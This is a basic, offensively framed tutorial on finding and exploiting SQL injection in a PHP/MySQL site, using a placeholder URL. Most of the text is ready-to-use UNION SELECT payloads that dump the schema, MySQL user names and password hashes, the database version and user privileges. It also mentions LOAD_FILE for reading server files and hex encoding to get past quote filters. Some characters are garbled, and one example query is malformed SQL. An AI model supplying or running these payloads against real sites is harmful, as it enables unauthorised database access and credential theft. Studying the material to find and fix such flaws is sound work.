--------------------
| SQL Injection |
--------------------

Description
Server type: LAMP

â—Â�   Linux

â—Â�   Apache

â—Â�   MySQL

â—Â�   PHP



In this simple article I will go through the basic steps of finding an SQL injection to fully exploiting a database.

Nevertheless this article is never enough! You have dig deeper, you have to try and work hard to acquire the necessary knowledge to launch a full attack and to fetch vulnerabilities.



Let’s start…



Let’s suppose we have the following URL:

http://fakeurl.com/index.php?id=1016



This is a page to post articles extracted from a database. Please note that not all urls having this form should be connected to a database! Some of them just extract the text from local .txt files or they are just includes?



Anyway, let’s test if this database can be injected with other code:



http://fakeurl.com/index.php?id=10160 or 1=1--



If you get a blank page or an error is displayed then you’ve got a vulnerability, if not don’t worry try this one:



http://fakeurl.com/index.php?id=10160 and 1=0--



The purpose here is to display informative error. Again you should get a blank page or an error.



If you are lucky, then you should proceed with your attack:



http://fakeurl.com/index.php?id=10160 ORDER BY 1--



Increment the order till you get a blank page or an error page, this will help us determine the column set size. Let’s suppose you get a blank page when u reached the number seven, this means that the number of columns that we can poison is 6. The next step will to union queries. Why we use union?



Let’s explain a little bit what:     ?id=10160 means:

When a http request is sent in the form or POST or GET the php code records the value after the = sign as a variable which is used after to get data from a database.



?id=1 Is transformed to this query :  SELECT FROM table article_title, article_body WHERE id=10160;



Now everything after the 1 is added to the main query:



http://fakeurl.com/index.php?id=10160 ORDER BY 1--    ::    SELECT FROM table article_title, article_body WHERE id=10160 ORDER BY 1--;

Now the union part:

SELECT ... SELECT   IS NOT VALID!



Thus we use SELECT ... UNION SELECT  : to combine two select statements and display both results!



Ok, now that we understood the inside, let’s move on! The next step is to use select to gain more info, don’t forget to replace 10160 with null just so the first SELECT statement isn’t executed!



http://fakeurl.com/index.php?id=null UNION ALL SELECT 1,2,3,4,5,6--



This should display: [And this is only an example]



1



           3               5

6



This means that we can replace 1,3,5,6 with functions or other things to display info on the page!



Let’s try the following:





http://fakeurl.com/index.php?id=null UNION ALL SELECT table_schema,2, table_name,4, column_name, ordinal_position from information_schema.COLUMNS--



Where:



table_schema: name of the database

table_name: name of the table in the database

column_name: name of the collumn in the table

ordinal_position: original position of the collumn



A Second statement to use is:



http://fakeurl.com/index.php?id=null UNION ALL SELECT host,2,user,4,password,6 from mysql.user--



host: host the user is valid on

user: users login name

password: encrypted stored hashes



A Third informational statement would be:



http://fakeurl.com/index.php?id=null UNION ALL SELECT version(),2,3,4,5,6--



version(): MySQL database version





Another Statement: [1]



http://fakeurl.com/index.php?id=null UNION ALL SELECT grantee,2, table_catalog,4, privilege_type, is_grantable from information_schema.USER_PRIVILEGES--



grantee: user reflecting the privileges

table_catalog: information regarding table catalog

privilege_type: the permission granted to the user

is_grantable: is the permission grantable





If the user on the database has file permissions, the LOAD_FILE routine can be used to extract and view the contents of files on the filesystem!



In order to bypass quote filtration we will be using an ascii -> hexadecimal string conversion utility. This effectively bypasses most quote filtration done via the application.



[1]: Taken from Understanding MySQL Union Poisoining | Jason A. Medeiros





I hope you made a good understanding of these injections, there are still a lot more to learn, you have MSSQL, PostgreSQL, ORACLE database that you need to learn? Plus knowing php is very helpful!



Please do not rely on this article to rank yourself among the best, this is very basic but still very helpful? Being the best is all about knowing why things happen!



Warm Regards,

Link-